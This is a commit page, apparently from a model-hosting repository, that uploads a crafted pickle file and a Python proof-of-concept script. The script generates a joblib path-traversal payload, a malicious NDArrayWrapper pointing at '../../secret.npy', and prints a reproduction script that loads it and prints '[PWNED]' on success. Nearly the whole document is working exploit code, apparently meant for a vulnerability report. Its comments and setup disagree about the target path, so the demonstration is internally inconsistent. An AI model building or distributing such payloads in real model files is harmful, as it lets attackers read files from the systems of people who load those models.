CandyCaine commited on
Commit
e3c004c
·
verified ·
1 Parent(s): 54b2587

Upload 2 files

Browse files
Files changed (2) hide show
  1. joblib_traversal.pkl +3 -0
  2. poc_joblib_gen.py +51 -0
joblib_traversal.pkl ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:315758be5e6f7a00dc79348701ce614e217bf00f473d06e0e7fd706442097ab6
3
+ size 143
poc_joblib_gen.py ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+
2
+ import os
3
+ import pickle
4
+ import joblib
5
+ import numpy as np
6
+ from joblib.numpy_pickle_compat import NDArrayWrapper
7
+
8
+ def generate_exploit():
9
+ print("[*] Generating Joblib Path Traversal Payload...")
10
+
11
+ # 1. Targeted Traversal File
12
+ # In a real report, we claim we can read sensitive files relative to the model.
13
+ # We will target "../secret.npy"
14
+ target_path = "../../secret.npy"
15
+
16
+ # 2. Craft Malicious Wrapper
17
+ # This wrapper tells joblib: "Verify my data is at ../../secret.npy"
18
+ # When joblib reads this, it triggers the traversal.
19
+ malicious_wrapper = NDArrayWrapper(filename=target_path, subclass=np.ndarray)
20
+
21
+ filename = "joblib_traversal.pkl"
22
+ with open(filename, "wb") as f:
23
+ pickle.dump(malicious_wrapper, f)
24
+
25
+ print(f"[+] Malicious Pickle written to: {filename}")
26
+ print("\n[+] REPRODUCTION SCRIPT (Run this to Verify):")
27
+ print("-" * 50)
28
+ print("import joblib")
29
+ print("import numpy as np")
30
+ print("import os")
31
+ print("")
32
+ print("# Setup: Create a dummy secret file outside the load directory")
33
+ print("os.makedirs('safe_dir', exist_ok=True)")
34
+ print("secret_data = np.array([123, 456], dtype=np.int32)")
35
+ print("np.save('secret.npy', secret_data)")
36
+ print("")
37
+ print("# Move payload to safe_dir to simulate isolation")
38
+ print("if os.path.exists('joblib_traversal.pkl'):")
39
+ print(" os.replace('joblib_traversal.pkl', 'safe_dir/model.pkl')")
40
+ print("")
41
+ print("print('Attempting to load model from safe_dir...')")
42
+ print("# This should FAIL to find the file if secure, but SUCCEEDS if vulnerable")
43
+ print("try:")
44
+ print(" data = joblib.load('safe_dir/model.pkl')")
45
+ print(" print(f'[PWNED] Successfully read file outside safe_dir: {data}')")
46
+ print("except Exception as e:")
47
+ print(" print(e)")
48
+ print("-" * 50)
49
+
50
+ if __name__ == "__main__":
51
+ generate_exploit()